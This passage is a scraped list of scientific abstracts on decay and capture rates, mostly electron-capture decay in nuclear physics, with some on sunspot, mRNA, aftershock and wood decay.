hydrogenlike, and heliumlike ions. The measured electron-capture decay constant of hydrogenlike {sup 140}Pr{sup 58+} ions is about 50% larger than that of heliumlike {sup 140}Pr{sup 57+} ions. Moreover, {sup 140}Pr ions with one bound electron decay faster than neutral {sup 140}Pr{sup 0+} atoms with 59 electrons. To explain this peculiar observation one has to take into account the conservation of the total angular momentum, since only particular spin orientations of the nucleus and of the captured electron can contribute to the allowed decay. 5. ELECTRON-CAPTURE AND β-DECAY RATES FOR sd-SHELL NUCLEI IN STELLAR ENVIRONMENTS RELEVANT TO HIGH-DENSITY O–NE–MG CORES SciTech Connect Suzuki, Toshio; Toki, Hiroshi; Nomoto, Ken’ichi 2016-02-01 Electron-capture and β-decay rates for nuclear pairs in the sd-shell are evaluated at high densities and high temperatures relevant to the final evolution of electron-degenerate O–Ne–Mg cores of stars with initial masses of 8–10 M{sub ⊙}. Electron capture induces a rapid contraction of the electron-degenerate O–Ne–Mg core. The outcome of rapid contraction depends on the evolutionary changes in the central density and temperature, which are determined by the competing processes of contraction, cooling, and heating. The fate of the stars is determined by these competitions, whether they end up with electron-capture supernovae or Fe core-collapse supernovae. Since the competing processes are induced by electron capture and β-decay, the accurate weak rates are crucially important. The rates are obtained for pairs with A = 20, 23, 24, 25, and 27 by shell-model calculations in the sd-shell with the USDB Hamiltonian. Effects of Coulomb corrections on the rates are evaluated. The rates for pairs with A = 23 and 25 are important for nuclear Urca processes that determine the cooling rate of the O–Ne–Mg core, while those for pairs with A = 20 and 24 are important for the core contraction and heat generation rates in the core. We provide these nuclear rates at stellar environments in tables with fine enough meshes at various densities and temperatures for studies of astrophysical processes sensitive to the rates. In particular, the accurate rate tables are crucially important for the final fates of not only O–Ne–Mg cores but also a wider range of stars, such as C–O cores of lower-mass stars. 6. Capture and decay of electroweak WIMPonium Asadi, Pouya; Baumgart, Matthew; Fitzpatrick, Patrick J.; Krupczak, Emmett; Slatyer, Tracy R. 2017-02-01 The spectrum of Weakly-Interacting-Massive-Particle (WIMP) dark matter generically possesses bound states when the WIMP mass becomes sufficiently large relative to the mass of the electroweak gauge bosons. The presence of these bound states enhances the annihilation rate via resonances in the Sommerfeld enhancement, but they can also be produced directly with the emission of a low-energy photon. In this work we compute the rate for SU(2) triplet dark matter (the wino) to bind into WIMPonium—which is possible via single-photon emission for wino masses above 5 TeV for relative velocity v < O(10‑2) —and study the subsequent decays of these bound states. We present results with applications beyond the wino case, e.g. for dark matter inhabiting a nonabelian dark sector; these include analytic capture and transition rates for general dark sectors in the limit of vanishing force carrier mass, efficient numerical routines for calculating positive and negative-energy eigenstates of a Hamiltonian containing interactions with both massive and massless force carriers, and a study of the scaling of bound state formation in the short-range Hulth&apos{e}n potential. In the specific case of the wino, we find that the rate for bound state formation is suppressed relative to direct annihilation, and so provides only a small correction to the overall annihilation rate. The soft photons radiated by the capture process and by bound state transitions could permit measurement of the dark matter's quantum numbers; for wino-like dark matter, such photons are rare, but might be observable by a future ground-based gamma-ray telescope combining large effective area and a low energy threshold. 7. Comment on 'Time modulation of K-shell electron capture decay rates of H-like heavy ions at GSI experiments.' SciTech Connect Lipkin, H. J.; Physics; Weizmann Inst. of Science; Tel Aviv Univ. 2010-04-16 A Comment on the Letter by A.N. Ivanov and P. Kienle, Physical Review Letters volume 103, Issue 6, 062502 (2009). The authors of the Letter offer a Reply to experimental data at GSI, the rates of the number of daughter ions, produced by the nuclear K shell electron capture decays of the H-like heavy ions with one electron in the K shell, such as {sup 140}Pr{sup 58+}, {sup 142}Pm{sup 60+}, and {sup 122}I{sup 52+}, are modulated in time with periods T{sub EC} of the order of a few seconds, obeying an A scaling T{sub EX}=A/20 s, where A is the mass number of the mother nuclei, and with amplitudes a{sub d {sup EC}}{approx}0.21. We show that these data can be explained in terms of the interference of two massive neutrino mass eigenstates. The appearance of the interference term is due to overlap of massive neutrino mass eigenstate energies and of the wave functions of the daughter ions in two-body decay channels, caused by the energy and momentum uncertainties introduced by time differential detection of the daughter ions in GSI experiments. 8. Decay curve study in a standard electron capture decay SciTech Connect Nishimura, D.; Fukuda, M.; Kisamori, K.; Kuwada, Y.; Makisaka, K.; Matsumiya, R.; Matsuta, K.; Mihara, M.; Takagi, A.; Yokoyama, R.; Izumikawa, T.; Ohtsubo, T.; Suzuki, T.; Yamaguchi, T. 2010-05-12 We have searched for a time-modulated decay in a standard electron capture experiment for {sup 140}Pr, in order to confirm a report from GSI, where an oscillatory decay has been observed for hydrogen-like {sup 140}Pr and {sup 142}Pm ions in the cooler storage ring. {sup 140}Pr has been produced with the {sup 140}Ce(p, n) reaction by a pulsed proton beam accelerated from the Van de Graaff accelerator at Osaka University. Resultant time dependence of the K{sub a}lpha and K{sub b}eta X-ray intensities from the daughter shows no oscillatory behavior. 9. Electron Capture Reactions and Beta Decays in Steller Environments SciTech Connect Suzuki, T.; Mao, H.; Honma, M.; Yoshida, T.; Kajino, T.; Otsuka, T. 2011-10-28 Electron capture reactions on Ni and Co isotopes are investigated by shell model calculations in steller environments. The capture rates depend sensitively on the distribution of the Gamow-Teller (GT) strength. The capture rates obtained by using GXPF1J Hamiltonian for fp-shell are found to be consistent with the rates obtained from experimental GT strength in {sup 58}Ni and {sup 60}Ni. Capture rates in Co isotopes, where there were large discrepancies among previous calculations, are also investigated. Beta decays of the N = 126 isotones are studied by shell model calculations taking into account both the GT and first-forbidden (FF) transitions. The FF transitions are found to be important to reduce the half-lives by twice to several times of those by the GT contributions only. Implications of the short half-lives of the waiting point nuclei on the r-process nucleosynthesis are discussed for various astrophysical conditions. 10. Precision Measurement of Nuclear Electron Capture Decay Koltick, David; Liu, Shih-Chieh; Wang, Haoyu; Heim, Jordan; Nistor, Jonathan 2017-01-01 The method of accurately measuring the radioactive decay constant of a isotope by measuring the decay rate as a function of time requires that both the detector and environment be stable over time periods comparable to the life-time of the isotope. In addition statistical accuracy requires initial counting rates be high but limited by the dead time capability of the data collection system and the detectors double-event resolving time. A High Purity Germanium (HPGe) spectrometer, sensitive to radiation from 3-KeV to over 3-MeV, has been built to measure radioactive decay constants to a level of 10-5 10-6 at a location only 6 meters from the core of the High Flux Isotope Reactor located at Oak Ridge National Laboratory. Such accuracy requires understanding of, background, signal-processing algorithms, and both the double and triple event pile-up in the observed spectrum. The approach taken is to fit the collected energy spectrum with invariant shapes, independent of event rate. By fixing the source-detector geometry and environmental conditions, the invariant shapes are (1) ideal energy spectrum without pile-up and background, (2) the ideal double event pile-up spectrum, (3) the ideal triple event pile-up spectrum, and (4) the stable background spectrum. A method is presented that finds these ideal shapes using the collected data in situ. Taking this approach the HPGe detector photopeak shape in the absence of background and pile-up is presented showing associated structure over a range of 7 orders of magnitude. 11. Structure and Decay at Rapid Proton Capture Waiting Points Hove, D.; Garrido, E.; Jensen, A. S.; Fynbo, H. O. U.; Fedorov, D. V.; Zinner, N. T. 2017-01-01 We investigate the region of the nuclear chart around A ˜eq 70 from a three-body perspective, where we compute reaction rates for the radiative capture of two protons. One key quantity is here the photon dissociation cross section for the inverse process where two protons are liberated from the borromean nucleus by photon bombardment. We find a number of peaks at low photon energy in this cross section where each peak is located at the energy corresponding to population of a three-body resonance. Thus, for these energies the decay or capture processes proceed through these resonances. However, the next step in the dissociation process still has the option of following several paths, that is either sequential decay by emission of one proton at a time with an intermediate two-body resonance as stepping stone, or direct decay into the continuum of both protons simultaneously. The astrophysical reaction rate is obtained by folding of the cross section as function of energy with the occupation probability for a Maxwell-Boltzmann temperature distribution. The reaction rate is then a function of temperature, and of course depending on the underlying three-body bound state and resonance structures. We show that a very simple formula at low temperature reproduces the elaborate numerically computed reaction rate. 12. Electron capture decay of {sup 116}In and nuclear structure of double {beta} decays SciTech Connect Bhattacharya, M.; Garcia, A.; Ortiz, C.E.; Kaloskamis, N.I.; Hindi, M.M.; Norman, E.B.; Davids, C.N.; Civitarese, O.; Suhonen, J. 1998-08-01 Quasiparticle-random-phase-approximation (QRPA) calculations of double {beta} decays have not been able to reproduce data in the A=100 system. We propose the A=116 system{emdash}because of its smaller deformation{emdash}as a simpler system to test QRPA calculations. We present results of two experiments we performed, which determine the electron-capture-decay branch of {sup 116}In to be (2.27{plus_minus}0.63){times}10{sup {minus}2}{percent}, from which we deduce logft=4.39{sub {minus}0.15}{sup +0.10}. We present QRPA calculations and compare their predictions to experimental data. Finally we use these calculations to predict the 2{nu} double-{beta}-decay rate of {sup 116}Cd to the ground and excited states of {sup 116}Sn. {copyright} {ital 1998} {ital The American Physical Society} 13. Californium-252 neutron capture and decay methods for elemental analysis NASA Technical Reports Server (NTRS) 1972-01-01 The feasibility of using a Cf-252 neutron source in conjunction with a capture and/or decay gamma ray method for elemental analysis on lunar or planetary missions was tested. The general problems of using a Cf-252 neutron source for both decay and capture gamma ray analysis in terrestrial environments included the determination of the capture gamma ray spectra by neutron absorption in various metals used for the space hardware, Cf-252 source encapsulation materials, shielding, geometry, and optimum source size for a space mission. Computer data reduction and data transmission techniques were also investigated. 14. Measuring radiative capture rates at DRAGON Hager, U.; Davids, B.; Fallis, J.; Greife, U.; Hutcheon, D. A.; Rojas, A.; Ruiz, C. 2013-04-01 The DRAGON recoil separator facility is located at the ISAC facility at TRIUMF, Vancouver. It is designed to measure radiative alpha and proton capture reactions of astrophysical importance in inverse kinematics. The Supernanogan ion source at ISAC provides stable beams of high intensities. The DRAGON collaboration has taken advantage of this over the last years by measuring several reactions requiring high-intensity stable oxygen beams. In particular,the ^17O(p,γ) and ^16O(α,γ) reaction rates were recently measured. The former reaction is part of the hot CNO cycle, and strongly influences the abundance of ^18F in classical novae. Because of its relatively long lifetime, ^18F is a possible target for satellite-based gamma-ray spectroscopy. The ^16O(α,γ) reaction plays a role in steady-state helium burning in massive stars, where it follows the ^12C(α,γ) reaction. At astrophysically relevant energies, the reaction proceeds exclusively via direct capture, resulting in a low rate. In both cases, the unique capabilities of DRAGON enabled determination not only of the total reaction rates, but also of decay branching ratios. Results from both experiments will be presented. 15. Electron-capture decay of [sup 100]Tc and the double-[beta] decay of [sup 100]Mo SciTech Connect Garcia, A.; Chan, Y.; da Cruz, M.T.F.; Larimer, R.M.; Lesko, K.T.; Norman, E.B.; Stokstad, R.G.; Wietfeldt, F.E.; Zlimen, I.; Moltz, D.M.; Batchelder, J.; Ognibene, T.J. ); Hindi, M.M. ) 1993-06-01 We have measured the electron-capture decay branch of [sup 100]Tc to be (1.8[plus minus]0.9)[times]10[sup [minus]3]%, from which we deduce log[ital ft]=4.45[sub [minus]0.30][sup +0.18]. This indicates that a two-step process connecting only the ground states of [sup 100]Mo-[sup 100]Tc-[sup 100]Ru can account for the measured 2[nu] double-[beta]-decay rate of [sup 100]Mo. 16. Searching for Experimental Verification of the Oscillation of Electron Capture Decay Probability Vetter, Paul 2009-05-01 A group from Gesellschaft f"ur Schwerionenforschung (GSI) last year published an observation of time oscillations of the electron capture decay rate of stored hydrogen-like ions of ^142Pm and ^140Pr.(Phys. Lett. B 664, 162 (2008)). They proposed that the oscillating decay rate was caused by interference between momentum states of the ion caused by neutrino mass and flavor mixing. This hypothesis has been controversial, with several authors arguing either that neutrino mixing can or cannot be responsible. If neutrino mixing is responsible for the decay rate oscillations, then it should be possible to detect these oscillations in a simpler experiment without using stored hydrogenic ions, by observing an electron capture decay rate with an appropriate experiment time structure. If this were possible, it could revolutionize the study of neutrino mixing by allowing much simpler experiments to make precise measurements of mass differences and mixing angles. At LBNL, we performed an experiment to search for oscillations in electron capture rate using ^142Pm produced with a time short compared to the oscillation period, and counting ^142Nd Kα x-rays from the daughter. The decay time spectrum is well-described by a simple exponential, and we observed no statistically significant decay rate oscillations at a level much lower than proposed. A literature search for previous experiments that might have been sensitive to the reported modulation uncovered a candidate in ^142Eu. A reanalysis of that published data shows no decay rate oscillation. A recent experiment at Munich also did not observe decay rate oscillations in decays of ^180Re. Other potential explanations for the GSI decay oscillation data have been proposed, including quantum beats by nearly degenerate initial parent ion states and Thomas precession in the stored ions. I will discuss the status of experimental results, and possibilities for experimental confirmation of the various models. This work was supported by 17. On decay constants and orbital distance to the Sun—part III: beta plus and electron capture decay Pommé, S.; Stroh, H.; Paepen, J.; Van Ammel, R.; Marouli, M.; Altzitzoglou, T.; Hult, M.; Kossert, K.; Nähle, O.; Schrader, H.; Juget, F.; Bailat, C.; Nedjadi, Y.; Bochud, F.; Buchillier, T.; Michotte, C.; Courte, S.; van Rooy, M. W.; van Staden, M. J.; Lubbe, J.; Simpson, B. R. S.; Fazio, A.; De Felice, P.; Jackson, T. W.; Van Wyngaardt, W. M.; Reinhard, M. I.; Golya, J.; Bourke, S.; Roy, T.; Galea, R.; Keightley, J. D.; Ferreira, K. M.; Collins, S. M.; Ceccatelli, A.; Verheyen, L.; Bruggeman, M.; Vodenik, B.; Korun, M.; Chisté, V.; Amiot, M.-N. 2017-02-01 The hypothesis that seasonal changes in proximity to the Sun cause variation of decay constants at permille level has been tested for radionuclides disintegrating through electron capture and beta plus decay. Activity measurements of 22Na, 54Mn, 55Fe, 57Co, 65Zn, 82+85Sr, 90Sr, 109Cd, 124Sb, 133Ba, 152Eu, and 207Bi sources were repeated over periods from 200 d up to more than four decades at 14 laboratories across the globe. Residuals from the exponential nuclear decay curves were inspected for annual oscillations. Systematic deviations from a purely exponential decay curve differ from one data set to another and appear attributable to instabilities in the instrumentation and measurement conditions. Oscillations in phase with Earth’s orbital distance to the sun could not be observed within 10-4-10-5 range precision. The most stable activity measurements of β + and EC decaying sources set an upper limit of 0.006% or less to the amplitude of annual oscillations in the decay rate. There are no apparent indications for systematic oscillations at a level of weeks or months. 18. Ratios of heavy hadron semileptonic decay rates SciTech Connect Gronau, Michael; Rosner, Jonathan L. 2011-02-01 Ratios of charmed meson and baryon semileptonic decay rates appear to be satisfactorily described by considering only the lowest-lying (S-wave) hadronic final states and assuming the kinematic factor describing phase space suppression is the same as that for free quarks. For example, the rate for D{sub s} semileptonic decay is known to be (17.0{+-}5.3)% lower than those for D{sup 0} or D{sup +}, and the model accounts for this difference. When applied to hadrons containing b quarks, this method implies that the B{sub s} semileptonic decay rate is about 1% higher than that of the nonstrange B mesons. This small difference thus suggests surprisingly good local quark-hadron duality for B semileptonic decays, complementing the expectation based on inclusive quark-hadron duality that these differences in rates should not exceed a few tenths of a percent. For {Lambda}{sub b} semileptonic decay, however, the inclusive rate is predicted to be about 13% greater than that of the nonstrange B mesons. This value, representing a considerable departure from a calculation using a heavy-quark expansion, is close to the corresponding experimental ratio {Gamma}({Lambda}{sub b})/{Gamma}(B)=1.13{+-}0.03 of total decay rates. 19. On the decay rate of sunspots Chapman, G. A.; Dobias, J. J.; Preminger, D. G.; Walton, S. R. 2003-02-01 We have analyzed the decay of 32 sunspots observed during the years 1988 through 2001 at the San Fernando Observatory (SFO). The data are from digital images obtained in the red (672 nm) with the Cartesian Full Disk Telescope No.1 (CFDT1). We find that the rate of decay is strongly correlated with the total sunspot area and the umbral to total area ratio. The multiple correlation coefficient is 0.93. Thus, the unexplained variance from this simple model is (1-0.87). We find that for the sunspots of this study, the decay rate is not a constant and that there is no significant correlation between the decay rate and the square root of the total spot area. 20. Top-down holographic glueball decay rates Brünner, F.; Parganlija, D.; Rebhan, A. 2016-01-01 We present new results on the decay patterns of scalar and tensor glueballs in the top-down holographic Witten-Sakai-Sugimoto model. This model, which has only one free dimensionless parameter, gives semi-quantitative predictions for the vector meson spectrum, their decay widths, and also a gluon condensate in agreement with SVZ sum rules. The holographic predictions for scalar glueball decay rates are compared with experimental data for the widely discussed gluon candidates f0(1500) and f0(1710). 1. Top-down holographic glueball decay rates SciTech Connect Brünner, F.; Parganlija, D.; Rebhan, A. 2016-01-22 We present new results on the decay patterns of scalar and tensor glueballs in the top-down holographic Witten-Sakai-Sugimoto model. This model, which has only one free dimensionless parameter, gives semi-quantitative predictions for the vector meson spectrum, their decay widths, and also a gluon condensate in agreement with SVZ sum rules. The holographic predictions for scalar glueball decay rates are compared with experimental data for the widely discussed gluon candidates f{sub 0}(1500) and f{sub 0}(1710) 2. Systematic muon capture rates in PQRPA SciTech Connect Samana, A. R.; Sande, D.; Krmpotić, F. 2015-05-15 In this work we performed a systematic study of the inclusive muon capture rates for several nuclei with A < 60 using the Projected Random Quasi-particle Phase Approximation (PQRPA) as nuclear model, because it is the only RPA model that treats the Pauli Principle correctly. We reckon that the comparison between theory and data for the inclusive muon capture is not a fully satisfactory test on the nuclear model that is used. The exclusive muon transitions are more robust for such a purpose. 3. Power spectrum analyses of nuclear decay rates Javorsek, D.; Sturrock, P. A.; Lasenby, R. N.; Lasenby, A. N.; Buncher, J. B.; Fischbach, E.; Gruenwald, J. T.; Hoft, A. W.; Horan, T. J.; Jenkins, J. H.; Kerford, J. L.; Lee, R. H.; Longman, A.; Mattes, J. J.; Morreale, B. L.; Morris, D. B.; Mudry, R. N.; Newport, J. R.; O'Keefe, D.; Petrelli, M. A.; Silver, M. A.; Stewart, C. A.; Terry, B. 2010-10-01 We provide the results from a spectral analysis of nuclear decay data displaying annually varying periodic fluctuations. The analyzed data were obtained from three distinct data sets: 32Si and 36Cl decays reported by an experiment performed at the Brookhaven National Laboratory (BNL), 56Mn decay reported by the Children's Nutrition Research Center (CNRC), but also performed at BNL, and 226Ra decay reported by an experiment performed at the Physikalisch-Technische Bundesanstalt (PTB) in Germany. All three data sets exhibit the same primary frequency mode consisting of an annual period. Additional spectral comparisons of the data to local ambient temperature, atmospheric pressure, relative humidity, Earth-Sun distance, and their reciprocals were performed. No common phases were found between the factors investigated and those exhibited by the nuclear decay data. This suggests that either a combination of factors was responsible, or that, if it was a single factor, its effects on the decay rate experiments are not a direct synchronous modulation. We conclude that the annual periodicity in these data sets is a real effect, but that further study involving additional carefully controlled experiments will be needed to establish its origin. 4. MAGNETIC FIELD-DECAY-INDUCED ELECTRON CAPTURES: A STRONG HEAT SOURCE IN MAGNETAR CRUSTS SciTech Connect Cooper, Randall L.; Kaplan, David L. E-mail: [email protected] 2010-01-10 We propose a new heating mechanism in magnetar crusts. Magnetars' crustal magnetic fields are much stronger than their surface fields; therefore, magnetic pressure partially supports the crust against gravity. The crust loses magnetic pressure support as the field decays and must compensate by increasing the electron degeneracy pressure; the accompanying increase in the electron Fermi energy induces nonequilibrium, exothermic electron captures. The total heat released via field-decay electron captures is comparable to the total magnetic energy in the crust. Thus, field-decay electron captures are an important, if not the primary, mechanism powering magnetars' soft X-ray emission. 5. Electron capture branching ratio measurements in an ion trap for double beta decay experiments at TITAN Brunner, T.; Brodeur, M.; Champagne, C.; Frekers, D.; Krücken, R.; Lapierre, A.; Delheij, P.; Ringle, R.; Ryjkov, V.; Smith, M.; Tanihata, I.; Dilling, J. 2008-10-01 Double beta decay (ββ) is a nuclear decay mode expected to appear in at least two varieties, the double-neutrino (2ν) and the zero-neutrino (0ν) mode. The 0νββ-decay is of particular interest as it requires the neutrino to be a Majorana particle. The search for such a decay is presently being carried out or planned in a number of experiments, such as EXO, MAJORANA, GERDA, CUORE, COBRA, NEMO-III and SNO+. The 0ν-decay rate depends on the neutrino mass but, unfortunately, also on a rather complex nuclear matrix element, making the extraction of the mass heavily dependent on the underlying theoretical nuclear model. However, all theoretical models can readily be tested against the 2ν mode, which, unlike its 0ν counterpart, only involves simple Gamow Teller nuclear matrix elements. These elements can be determined experimentally either through charge-exchange reactions or, for the ground-state transition, through the electron capture (EC) or single β-decay of the intermediate odd odd nucleus. The present program is geared towards the measurement of the EC branching ratios (BR). In most cases, these ratios are poorly known or not known at all, because EC is usually suppressed by several orders of magnitude compared to the β-decay counterpart due to energy considerations. Traditional methods for measuring these ratios have so far suffered from overwhelming background generated by these high-energy electrons. Recently, a unique background-free method for measuring EC branching ratios was proposed using the TITAN ion trap at the TRIUMF ISAC (Isotope Separator and ACcelerator) radioactive beam facility. The measurements will make use of the EBIT (Electron Beam Ion Trap) operating in Penning mode where electrons from the β--decay will be confined by the magnetic field. K-shell X-rays from EC will be detected by seven X-ray detectors located around the trap, thus providing orders of magnitude background suppression and thus ideal low-BR measurement environment. 6. Calculation of doublet capture rate for muon capture in deuterium within chiral effective field theory Adam, J.; Tater, M.; Truhlík, E.; Epelbaum, E.; Machleidt, R.; Ricci, P. 2012-03-01 The doublet capture rate Λ1 / 2 of the negative muon capture in deuterium is calculated employing the nuclear wave functions generated from accurate nucleon-nucleon (NN) potentials constructed at next-to-next-to-next-to-leading order of heavy-baryon chiral perturbation theory and the weak meson exchange current operator derived within the same formalism. All but one of the low-energy constants that enter the calculation were fixed from pion-nucleon and nucleon-nucleon scattering data. The low-energy constant dˆR (cD), which cannot be determined from the purely two-nucleon data, was extracted recently from the triton β-decay and the binding energies of the three-nucleon systems. The calculated values of Λ1 / 2 show a rather large spread for the used values of the dˆR. Precise measurement of Λ1 / 2 in the future will not only help to constrain the value of dˆR, but also provide a highly nontrivial test of the nuclear chiral EFT framework. Besides, the precise knowledge of the constant dˆR will allow for consistent calculations of other two-nucleon weak processes, such as proton-proton fusion and solar neutrino scattering on deuterons, which are important for astrophysics. 7. Aftershock Decay Rates in the Iranian Plateau Ommi, S.; Zafarani, H.; Zare, M. 2016-07-01 Motivated by the desire to have more information following the occurrence of damaging events, the main purpose of this article is to study aftershock sequence parameters in the Iranian plateau. To this end, the catalogue of the Iranian earthquakes between 2002 to the end of 2013 has been collected and homogenized among which 15 earthquakes have been selected to study their aftershock decay rates. For different tectonic provinces, the completeness magnitudes ( M c) of the earthquake catalogue have been calculated in different time intervals. Also, the M c variability in spatial and temporal windows has been determined for each selected event. For major Iranian earthquakes, catalogue of aftershocks has been collected thanks to three declustering methods: first, the classical windowing method of Gardner and Knopoff (Bull Seismol Soc Am 64:1363-1367, 1974); second, a modified version of this using spatial windowing based on the Wells and Coppersmith (Bull Seismol Soc Am 84:974-1002, 1994) relations; and third, the Burkhard and Grünthal (Swiss J Geosci 102:149-188, 2009) scheme. Effects of the temporal windows also have been investigated using the time periods of 1 month, 100 days, and 1 year in the declustering method of Gardner and Knopoff (Bull Seismol Soc Am 64:1363-1367, 1974). In the next step, the modified Omori law coefficients have been calculated for the 15 selected earthquakes. The calibrated regional generic model describing the temporal and magnitude distribution of aftershocks is of interest for time-dependent seismic hazard forecasts. The regional characteristics of the aftershock decay rates have been studied for the selected Iranian earthquakes in the Alborz, Zagros and Central Iran regions considering their different seismotectonics regimes. However, due to the lack of sufficient data, no results have been reported for the Kopeh-Dagh and Makran seismotectonic regions. 8. Gamow-Teller strength and lepton captures rates on 66‑71Ni in stellar matter Charge-changing transitions play a significant role in stellar weak-decay processes. The fate of the massive stars is decided by these weak-decay rates including lepton (positron and electron) captures rates, which play a consequential role in the dynamics of core collapse. As per previous simulation results, weak interaction rates on nickel (Ni) isotopes have significant influence on the stellar core vis-à-vis controlling the lepton content of stellar matter throughout the silicon shell burning phases of high mass stars up to the presupernova stages. In this paper, we perform a microscopic calculation of Gamow-Teller (GT) charge-changing transitions, in the β-decay and electron capture (EC) directions, for neutron-rich Ni isotopes (66‑71Ni). We further compute the associated weak-decay rates for these selected Ni isotopes in stellar environment. The computations are accomplished by employing the deformed proton-neutron quasiparticle random phase approximation (pn-QRPA) model. A recent study showed that the deformed pn-QRPA theory is well suited for the estimation of GT transitions. The astral weak-decay rates are determined over densities in the range of 10-1011g/cm3 and temperatures in the range of 0.01 × 109-30 × 109K. The calculated lepton capture rates are compared with the previous calculation of Pruet and Fuller (PF). The overall comparison demonstrates that, at low stellar densities and high temperatures, our EC rates are bigger by as much as two orders of magnitude. Our results show that, at higher temperatures, the lepton capture rates are the dominant mode for the stellar weak rates and the corresponding lepton emission rates may be neglected. 9. Weak {gamma}-transition intensities in the electron capture decay of {sup 144}Pm SciTech Connect Robinson, S.J.; Altgilbers, A.S.; Hindi, M.M.; Norman, E.B.; Larimer, R. 1996-09-01 We have determined the absolute intensity of weak {gamma} transitions in the level scheme of {sup 144}Nd, observed following the electron capture decay of {sup 144}Pm. The absolute intensity of the 1397-keV {ital E}3 branch from the 2093-keV (5{sub 1}{sup {minus}}) level was determined to be (4.9 {plus_minus} 0.7) {times} 10{sup {minus}4}{percent}. This leads to a revised absolute transition rate of {ital B}({ital E}3;5{sub 1}{sup {minus}}{r_arrow}2{sup +}{sub 1})=26{sub {minus}12}{sup +15} Weisskopf units, which is still consistent with an interpretation of the 5{sub 1}{sup {minus}} level based on quadrupole-octupole coupling. {copyright} {ital 1996 The American Physical Society.} 10. Search for Environmental Influences on the ^7Be Decay Rate* Norman, E. B.; Rech, G. A.; Dragowsky, M. R.; Chan, Y. D.; Perillo Isaac, M. C.; Larimer, R.-M. 1998-10-01 ^7Be plays an important role in the generation of solar neutrinos. Because ^7Be decays via electron capture, its half life depends on the electron density at the nucleus. Two groups have recently reported observations of variations on the order of 1 percent in the decay rate of ^7Be as a function of the physical environment in which the ^7Be is located.^1,2 In order to test this idea, we measured the half life of ^7Be in four different materials. Samples of ^7Be in graphite, boron nitride, tantalum, and gold were produced at LBNL's 88" Cyclotron. Each ^7Be sample was packaged together with a ^133Ba reference source and then counted in 1-day time bins periodically over a 4-month period using a germanium detector. In order to reduce systematic effects from variations in detector or electronics performance, the ^7Be half life was determined by comparing the numbers of 478-keV ^7Be and 356-keV ^133Ba gamma rays from each sample. Results from analysis of this data will be presented. *Work supported by the U.S. Dept. of Energy under contract Nos. DE-AC03-76SF00098 and DE-FG03-98ER41060. 1. D. Souza et al., Bull. Am. Phys. Soc. 42, 1679 (1997). 2. A. Ray et al., submitted to Phys. Rev. Lett. (1998). 11. Absolute intensity of internal bremsstrahlung from the electron capture decay of {sup 125}I SciTech Connect Hindi, M.M.; Kozub, R.L.; Robinson, S.J. 1995-11-01 The absolute intensity of the internal bremsstrahlung spectrum accompanying the electron capture decay of {sup 125}I has been measured and compared to the recent calculation of Suric {ital et} {ital al}. The measured intensity above the 1{ital s} end point is found to be (86{plus_minus}10)% of the calculated intensity. 12. Comment on Double K -shell ionization in the electron capture decay of sup 55 Fe'' SciTech Connect Hindi, M.M.; Kozub, R.L. ); Nagy, H.J. ); Schupp, G. ) 1991-11-01 The corrections made in a recent paper to the published values for double {ital K}-shell ionization in the electron capture decays of {sup 54}Mn and {sup 65}Zn are not applicable to the data from which these values were derived. Attention is called to a recent article that is relevant to the topic of the paper. 13. Heritable variation of mRNA decay rates in yeast. PubMed Andrie, Jennifer M; Wakefield, Jon; Akey, Joshua M 2014-12-01 Gene expression levels are determined by the balance between rates of mRNA transcription and decay, and genetic variation in either of these processes can result in heritable differences in transcript abundance. Although the genetics of gene expression has been a subject of intense interest, the contribution of heritable variation in mRNA decay rates to gene expression variation has received far less attention. To this end, we developed a novel statistical framework and measured allele-specific differences in mRNA decay rates in a diploid yeast hybrid created by mating two genetically diverse parental strains. We estimate that 31% of genes exhibit allelic differences in mRNA decay rates, of which 350 can be identified at a false discovery rate of 10%. Genes with significant allele-specific differences in mRNA decay rates have higher levels of polymorphism compared to other genes, with all gene regions contributing to allelic differences in mRNA decay rates. Strikingly, we find widespread evidence for compensatory evolution, such that variants influencing transcriptional initiation and decay have opposite effects, suggesting that steady-state gene expression levels are subject to pervasive stabilizing selection. Our results demonstrate that heritable differences in mRNA decay rates are widespread and are an important target for natural selection to maintain or fine-tune steady-state gene expression levels. © 2014 Andrie et al.; Published by Cold Spring Harbor Laboratory Press. 14. Heritable variation of mRNA decay rates in yeast PubMed Central Andrie, Jennifer M.; Wakefield, Jon 2014-01-01 Gene expression levels are determined by the balance between rates of mRNA transcription and decay, and genetic variation in either of these processes can result in heritable differences in transcript abundance. Although the genetics of gene expression has been a subject of intense interest, the contribution of heritable variation in mRNA decay rates to gene expression variation has received far less attention. To this end, we developed a novel statistical framework and measured allele-specific differences in mRNA decay rates in a diploid yeast hybrid created by mating two genetically diverse parental strains. We estimate that 31% of genes exhibit allelic differences in mRNA decay rates, of which 350 can be identified at a false discovery rate of 10%. Genes with significant allele-specific differences in mRNA decay rates have higher levels of polymorphism compared to other genes, with all gene regions contributing to allelic differences in mRNA decay rates. Strikingly, we find widespread evidence for compensatory evolution, such that variants influencing transcriptional initiation and decay have opposite effects, suggesting that steady-state gene expression levels are subject to pervasive stabilizing selection. Our results demonstrate that heritable differences in mRNA decay rates are widespread and are an important target for natural selection to maintain or fine-tune steady-state gene expression levels. PMID:25258386 15. Detection and assessment of wood decay in glulam beams using a decay rate approach Senalik, Adam; Beall, Frank C.; Reis, Henrique 2010-04-01 A glulam beam retired from the field and without visible indications of wood decay was used. Towards detection and assessing wood decay, X-ray computer tomography and ultrasonic measurements were carried out. It was observed that decrease in mass density with increasing levels of wood decay affects x-rays attenuation and allows radioscopy to detect and assess wood decay. To detect and assess decay when only one lateral side of the beam is available, a modified impulse-echo is presented. The modified impulse-echo approach is based on observing the dynamic response of each lamina in the glulam beam to the drop of a steel sphere onto a steel plate coupled to the glulam beam lamina and upon a decay rate analysis of the corresponding time domain signal in a frequency band of interest. The selection of the frequency band of interest only requires knowledge of the nominal transverse dimensions of each lamina in the beam and of the corresponding wood species. It was observed that decay rate analysis allows detection and assessment of wood decay. The decay rate approach leads to an overall rate of false calls of 7.2%. Considering the variability that exists in wood including the presence of splits, orientation and thickness of growth rings, etc., this relative low rate of false calls makes this approach very attractive. Results show that results from both X-ray computer tomography and impulse-echo decay-rated based measurements are consistent with each other and can be used to detect and assess wood decay in structural lumber. 16. Detection and Assessment of Wood Decay in Glulam Beams Using a Decay Rate Approach: A Review Treesearch 2013-01-01 A glulam beam is subjected to X-ray computer tomography and acousto-ultrasonic measurements to detect and assess wood decay. A glulam beam without visible indications of wood decay was taken from field use. A modified impulse-echo technique is employed as an inspection method requiring access to only one side of the beam. It is observed that decay-rate analysis of the... 17. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2012 CFR 2012-07-01 ... 